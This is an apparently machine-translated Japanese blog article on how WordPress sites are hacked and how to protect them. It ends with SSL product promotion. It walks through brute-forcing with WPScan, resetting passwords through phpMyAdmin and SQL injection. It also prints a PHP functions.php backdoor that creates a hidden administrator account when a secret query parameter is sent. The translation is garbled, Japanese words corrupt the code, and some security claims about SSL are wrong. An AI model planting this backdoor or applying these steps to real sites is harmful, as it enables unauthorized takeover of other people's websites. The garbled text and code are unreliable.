• ワードプレス

WordPressをハックする方法とは?

  • Felix Rose-Collins
  • 1 min read
WordPressをハックする方法とは?

イントロ

この記事を始める前に、ハッキングは違法であり、私たちは悪意のある行為を動機づけたり、奨励したりしないことをご理解いただきたいと思います。この記事は、詐欺師がどのように働くか、また、サイトセキュリティの様々な方法が、彼らを寄せ付けないためにいかに重要であるかについての知識を得るためだけのものです。では、話し合いましょう。

  • 詐欺師はどのようにWordPressをハッキングするのか?
  • WPサイトを詐欺師から守るには?

それでは、さっそくこのトピックを始めましょう。

How to Hack WordPress Website Online?

ワードプレスサイトをオンラインでハックする方法 (出典wpsecurityninja.com)。

WPScanを使用する。

WPScanは、サイトオーナーがWordPressサイトの脆弱性をチェックするのに役立つWPセキュリティスキャナですが、このスキャナはハッカーがウェブサイトをハックする動機を満たすためにも利用されています。

WPScanは、サイトオーナーや管理者がWPのユーザーアカウントやブルートフォースパスワードを指定することを許可し、WPアカウントへの不正アクセスの最前線となるものです。

WPScanを使ったユーザー名とパスワードのブルートフォース(総当り)](image4.png) (WPScanを使ったユーザー名とパスワードのブルートフォース.ソースはこちらMedium)

MIM攻撃

MIM攻撃:Man-in-middle(MIM)攻撃は、同じようなLANを使用しているユーザーの場合、簡単に実行することができます。暗号化されていないユーザーログインは、すべての詳細が平文で見えるため、格好の標的です。

この種の攻撃を行うソフトウェアは、侵害されたテーマやプラグインを検出し、ユーザーを列挙することができます。

MIM攻撃](image3.png) (出典Medium)

SQLインジェクション

SQLインジェクション攻撃は、Webサイトに侵入するために使用される最も顕著な攻撃と考えられています。これらの攻撃は、Webサイトのバックエンドゲートウェイを標的とし、ハッカーが危険なコマンドを実装することによって侵入することを許可します。

SQLインジェクション](image6.jpg) (出典secure.wphackedhelp.com)

また、これらの侵入により、ハッカーはデータベースやコマンドを変更し、サイト情報を削除したり、盗んだりすることができます。

これらのSQL攻撃は、脆弱性やパッチが適用されていないサイトにスポットライトを当てるため、ハッキング作業を容易にし、成功させることができます。

My SQL/cPanelを利用する。

この方法では、ハッカーは偽のアカウントを作成するか、現在のWPサイトのユーザーのパスワードを変更します。ハッカーは、PhpMyAdminを開くことによって、cPanel経由で侵入を試みます。彼らは、_usersで終わるテーブルを探し、変更したいユーザーを見つけます。

これによって、ハッキングを計画しているユーザーの認証情報を変更することができます。彼らはそのユーザーを追跡し、オンラインMD5ジェネレーターを開いてユーザーのパスワード(user_passフィールドから)を変更し、同じものを彼らの望むものに置き換え、後で#をクリックします。

私のSQL/cPanelを利用する](image5.jpg) (ユーザー名、ユーザーのハッシュ化されたパスワード、EメールIDなどは、すべてwp_usersデータベーステーブルに格納されています。ソースはこちらfirstsiteguide.com)。

ユーザー名、ユーザーのハッシュ化されたパスワード、EメールIDなどは、すべてwp_usersデータベース・テーブルに格納されています。

Functions.phpを編集します。

ハッカーは、Functions.phpファイルを変更するためにcPanelにアクセスすることもあります。ファイルマネージャのロックを解除することで、彼らはアクティブなテーマのフォルダを探します。 public_html/wp_content/themesフォルダから、彼らはテーマを追跡し、彼らの侵害されたコードを配置することにより、functions.phpを編集します。ハッカーによって新しいアカウントが作成されたため、ハッキングはすでに進行しています。ハッキングが完了すると、彼らは侵害されたコードを消去します。

FTPで新しいユーザーアカウントを作成します。

一般的に、FTPアカウントは、サイトオーナーがサイト内にディレクトリを作成し、特定のユーザーがログイン情報を使用してファイルをアップロード/ダウンロードすることを許可するのに役立ちます。

また、これらのファイルはインターネット上で閲覧されます。

> サイト上にFTPアカウントを作成するためのステップ:> > - 必要なデータを入力します。 > - 新しいFTPユーザーのユーザー名を入力します。 > - FTP経由でアクセスするためのアカウントを割り当てるためのパスワードを入力します。 > - FTPでアクセスするためのディレクトリ名を入力します。 > - あなたがこのフォルダに割り当てたい希望のMBスペースを書き込みます。 > その後、"Create "ボタンを押すと、新しいアカウントが作成されます。

FTPでアクセスするためには、以下のデータを読み込む必要があります。


アドレス / ホスト名 / 住所:yourdomain.com または ftp.yourdomain.com

ユーザー / User: [email protected]

パスワード: このFTPアカウントに割り当てられているエルパスワード

ポート: 21 ファイルをアップロード/ダウンロードするためのフォルダー名を指定します。


新しいユーザーは、選択したディレクトリとそのサブディレクトリの両方に対して読み取り権限と書き込み権限を持つことになります。

例えば、クライアントユーザーを作成し、そのユーザーに / home / user / public_html へのアクセス権を与えたとします。

バックドアから侵入する

サイトに侵入する悪質な方法は、バックドアを経由することです。あなたのサイトにアクセスしようとする詐欺師であれ、バックドア経由でサイトへのアクセスを回復しようとする被害者ユーザーであれ、どちらも以下のステップを踏む必要があります。

FTPで新しいユーザー・アカウントを作成したり、パスワードのリセットを行ったが、思うような結果が得られない場合、バックドア経由でサイトをハッキングし、管理者権限を取り戻したいと考えるかもしれません。

**バックドア作成手順

  • functions.phpファイルを開き、以下のコードを貼り付けます。

``php add_action('wp_head', 'wploop_backdoor')を実行します。 function wploop_backdoor() { (バックドア) If ($_GET['backdoor'] == 'knockknock') { require('wp-includes/registration.php') を実行します。 If (!username_exists('ユーザー名')){ $user_id = wp_create_user('name', 'pass'); $user = new WP_User($user_id); $user->set_role('administrator'); } } } ?>



- 後で変更を保存します。

### Crypto Jacking & Cryptocurrency Mining(クリプトジャッキング&クリプトカレンシーマイニング)。

暗号通貨の人気は、暗号通貨マイニングマルウェアとも呼ばれる[クリプトジャッキング](https://en.wikipedia.org/wiki/Cryptojacking)のような新しいサイバー脅威を生み出しています。

ユーザーの意思だけでなく、意識に反してコンピュータを没収する行為をクリプトジャッキングと呼びます。クリプトジャッキングマルウェアでは、詐欺師がシステムやネットワークを侵害するためのソフトウェアを介して配信される悪意のあるマルウェアをユーザーのコンピュータに感染させます。

### フィッシング

フィッシングとは、詐欺師が法人になりすまし、ユーザーの機密情報(ログイン情報、ソーシャルアカウント番号、暗証番号、クレジットカード情報など)をだまし取る手口です。彼らは通常、電子メールを使って目的を達成します。

> 例:詐欺師は、信頼できる情報源になりすまし、ユーザーの個人情報を収集し、欲望を満たすことがあります。
> また、フィッシングメールに[Bad Link](/blog/complete-guide-to-cleaning-up-your-bad-backlinks/)を記載し、不正なサイトへ誘導し、マルウェアを配信することもあります。


### マルウェア

 *マルウェア: *[WordPress Security Statistics](https://wpclipboard.com/wordpress-statistics-infographic/) によると、偽の SEO プラグインが原因で、4000 の WP ウェブサイトがマルウェアに感染しています。

詐欺師は、マルウェアを配信するためのソースを必要としません。SEOプラグイン、WPテーマ、その他サイトに存在する多くの要因が、最近のWP-VCDマルウェアを使用するハッカーの動機になっています。

フィッシングメールさえも、マルウェアを配信するための入り口なのです。

ここでもハッカーのモットーは同じで、システムに侵入して情報を盗むことで、ユーザーから機密データを得ることなのです。

### WordPress ランサムウェア

WPランサムウェアでは、ハッカーは、システムやネットワークへのユーザーのアクセスをブロックするためにマルウェアを使用します。ハッカーが要求する身代金を支払うことで、ユーザーは同じものを回復することができます。 
> 例:Petya攻撃(https://en.wikipedia.org/wiki/Petya_(マルウェア))では、ハッカーがファイルやデータを暗号化し、復号化キーに対して身代金を要求します。

### クロスサイトスクリプティング(XSS)攻撃。
XSS 攻撃は、ハッカーが悪意のあるコンテンツをウェブサイトに注入し、ブラウザを悪用することによって実行されます。この攻撃により、ハッカーはCookieからデータを盗み、サイトのコンテンツを変更し、機密データを得るためにウェブサイトを乗っ取ることができます。

### クリックジャッキング。
クリックジャックでは、ハッカーはボタンやリンクを悪意を持って侵害しようとし、ユーザーに侵害されたオブジェクトをクリックさせるように仕向けます。 
これにより、ハッカーは悪意のあるコマンドを実行し、ユーザーの機密データにアクセスできるようになります。 

### スプーフィング。

スプーフィング:スプーフィングとは、信頼できる人物になりすまし、ユーザーに不正な利益を与え、機密情報を提出させる攻撃です。 

これらのハッキング攻撃を防ぐには、WPウェブサイトの安全性を確保するために、特定のセキュリティ対策を講じる必要があります。 

## ハッキングからWordPressウェブサイトを保護する方法? 

ハッキングからWordPressを守るには](spoofing.jpg)
(出典[envisagedigital.co.jp](https://www.envisagedigital.co.uk/wordpress-market-share/))

上記の統計は、WordPressの人気を示すのに十分なものです。この人気は、ハッカーの間でこのCMSプラットフォームをより望ましいものにしており、彼らはWPのウェブサイトとそのデータにアクセスするために様々なハッキング手法を試しています。 

したがって、ハッカーがあなたのWPサイトにアクセスするのを防ぐ方法を知っておくことが不可欠です。 

### SSL証明書でWPサイトを保護する。

サイト上にデータが読み込まれるとき、それは常にプレーンテキストで、ハッカーを含むすべての人が簡単に見ることができます。これは、ハッカーがあなたのサイトのデータを悪用する可能性があるため、危険なことです。

SSL *(Secure Socket Layers)*証明書は、このようにコード化された形式にあなたのサイトのデータを変換し、256ビット暗号化セキュリティであなたのWPサイトを保護するために役立つそれらのデジタル証明書です。

ハッカーは、彼らがあなたのサイトにアクセスしているにもかかわらず、コードを読み取ることはできませんし、それゆえ、彼らはそのようなサイトを離れることを余儀なくされています.

SSL証明書によるWPサイトの安全性確保](ssl.jpg)
(出典[clickssl.net](https://www.clickssl.net/cheapest-wildcard-ssl-certificate-for-sub-domains))。

ご希望のブランドのSSL証明書(Comodo、Thawte、RapidSSLなど)を選択し、WPサイトに同じものをインストールします。SSL証明書の種類の場合、ドメインとサブドメインを理解する必要があります。たとえば、あなたの WP サイトにサブドメインがある場合は、1 つの [安いワイルドカード証明書](https://www.clickssl.net/cheapest-wildcard-ssl-certificate-for-sub-domains) コストだけ *$45/year* 約、デジタル ビジネス全体を保護することができます。 

迅速な発行、2048 ビット キー暗号化、SEO のブースト、サイト信頼シール、99% ブラウザー/モバイル互換性、返金ポリシー、および保証は、ワイルド カード SSL 証明書をインストールする機能と利点の一部です。

様々 なブランドと SSL 製品のオプション、予算に優しいレート、および優れた顧客サービスあなたの WP サイトのセキュリティのためのクリック SSL ショップに近づくの利点のいくつかです。

### 従業員を更新してください。

ヒューマンエラーは悲惨な事態を招く可能性があるため、従業員が脆弱にならないよう、常に最新のサイバー脅威に関する情報を提供してください。 

ハッキングされたウェブサイトの不審なシグナルを従業員が初期段階で追跡できれば、関係者に知らせ、サイトや[ビジネス](/blog/5-ways-to-boost-sales-on-your-online-business/)がさらなる被害を受けるのを防ぐことができます。

### 二要素認証(2FA)を使用する。

サイトへのログイン時に2FAを導入することは、ブルートフォース攻撃を防ぐための最も重要な方法です。セキュリティのレイヤーを増やすだけでなく、サイトやユーザーのデータを保護することもできます。 

これは、1つのセキュリティ層が侵害された場合、詐欺師がウェブサイトにアクセスするためには、2番目の層に侵入する必要があるためです。 

これは難しいことで、そのため、ほとんどの場合、詐欺師は他のセキュリティの低いサイトに移動することになります。

> **Tip:** [WP 2FA](https://wordpress.org/plugins/wp-2fa/) は無料のWPプラグインで、あなたのWPサイトに追加のセキュリティ・レイヤーを提供します。 

### 管理者ユーザーを定期的に監査する。

これは、WPサイトのセキュリティのために重要です。管理者ユーザーを定期的に監査し、そのアクセスをクロスチェックするようにしてください。 

また、セキュリティ上の問題を防ぐために、ユーザーや従業員がそれぞれのタスクに応じて制限されたアクセス権を持っていることを確認します。

### WordPressのコアを定期的にアップデートする。

WP Coreについてご存知ないですか?

WP Coreは、WPが動作するために必要なすべての基本的な基礎ファイルが含まれていることを簡単に説明しましょう. 

WordPress.orgからダウンロードしたWPのzipファイルに含まれるファイル一覧は以下の通りです。

!【WordPress Coreを定期的に更新する】(image10.png)
(出典[ithemes.com](https://ithemes.com/blog/wordpress-core/))。

これらのコアファイルは、セキュリティアップデートのリリース後、すべてのセキュリティ脆弱性を修正するために定期的に更新する必要があります。

### 信頼できるソースからWPテーマとプラグインをダウンロードする。

彼らは信頼できないソースから更新またはインストールされていないときにプラグインが脅威となることができるので、これは極めて重要である.無料/有料プラグインを使用する場合には、常に以下のような要因を確認してください。

- ユーザーの評価とレビュー 
- ユーザーの利便性 
- 互換性
- セキュリティ 
- 信頼性 

信頼できるソースからWPテーマとプラグインをダウンロードする](image11.png)
(ソースはこちら[torquemag.io](https://torquemag.io/2018/04/is-that-plugin-reliable-how-to-test-wordpress-plugins/))です。

WPテーマのインストールも同じルールが適用されます。 

### WPテーマとプラグインを定期的に更新する。

古い、または期限切れのWPテーマとプラグインは、セキュリティ標準を失うので、常にWPサイトに脅威をもたらす。ハッカーがそのようなゲートウェイを使用してマルウェアを拡散し、サイトにアクセスするのを防ぐために、WPサイトで使用されているテーマとプラグインを定期的に更新することを確認してください。

これは、プラグインが正常に機能し、WPの最新バージョンとの同期を維持するのに役立ちます. 

> **ヒント:**プラグインページで、あなたは、インストールされているすべてのプラグインと各プラグインの横に "自動更新を有効にする "と述べたリンクを表示することができます.自動更新をオンにする。

### デフォルトの管理者名を変更する。

ハッカーはとても賢く、デフォルトの管理者名を使えば簡単にあなたのWPサイトに侵入することができます。ハッカーがブルートフォース攻撃を行い、あなたのウェブサイトに不正にアクセスすることを防ぐために、デフォルトの管理者名を変更することが望ましいです。

### 限定的なアクセスを許可する。

このルールは、ユーザーや従業員にサイトへのアクセスを許可する場合にも当てはまります。 

アクセスコントロールは、誰がウェブサイトにアクセスできるか、できないかを定義するため、サイトとデータのセキュリティの最も重要なルールです。WPの管理画面やその他の重要なコード、データへの入り口はすべてブロックし、サイトのセキュリティを確保します。

アクセスを制限することで、生産性が向上するだけでなく、悪意のある入力からサイトを保護することができます。

### WordPressを更新しました。

WordPressが更新されていないと、ハッカーに侵入される危険性があります。

WordPressは市場シェアの37%を占めており、セキュリティホールやバグを修正するために定期的にアップデートをリリースし続けています。これらのアップデートはまた、あなたのサイトのパフォーマンスを向上させるために有用である既存のものの新機能や改良が含まれています。 

WordPressを常にアップデートすべき理由](update-wordpress.png)
(出典[wpbeginner.com](https://www.wpbeginner.com/beginners-guide/why-you-should-always-use-the-latest-version-of-wordpress/))

堅牢なセキュリティのために、WPサイトを常にアップデートしておきましょう。

## まとめ

強固で複雑なパスワードを使用し、WPサイトだけでなく、プラグインやテーマも更新して、すべてのセキュリティの欠点を修正しましょう。また、従業員の教育にも力を入れ、災害を未然に防ぎましょう。

セキュリティにルーズになることはありませんし、常に最高の、信頼できるセキュリティプラグインを使用して、詮索好きな目からあなたのWPサイトを安全に保つことを確認してください。さらに、顧客の信頼、ビジネス、そして[SEO](/blog/what-is-seo/)を高めるために、SSLでサイトを保護しましょう。  

ハッカーがどのように機能するかを知っていただいたので、この記事がハッカーの侵入を防ぎ、安全な方法でWPサイトを管理する上でお役に立てれば幸いです。 


export const _frontmatter = {"title":"WordPressをハックする方法とは?","description":"この記事を始める前に、ハッキングは違法であり、私たちは悪意のある行為を動機づけたり、奨励したりするものではないことをご理解いただきたいと思います。この記事は、詐欺師の手口と、詐欺師を寄せ付けないための様々なサイトセキュリティの方法について知っていただくためのものです。","date":"2022-04-06","image":"intro.png","authors":"Felix Rose-Collins","category":"ワードプレス"}

Ranktrackerを無料でお試しください。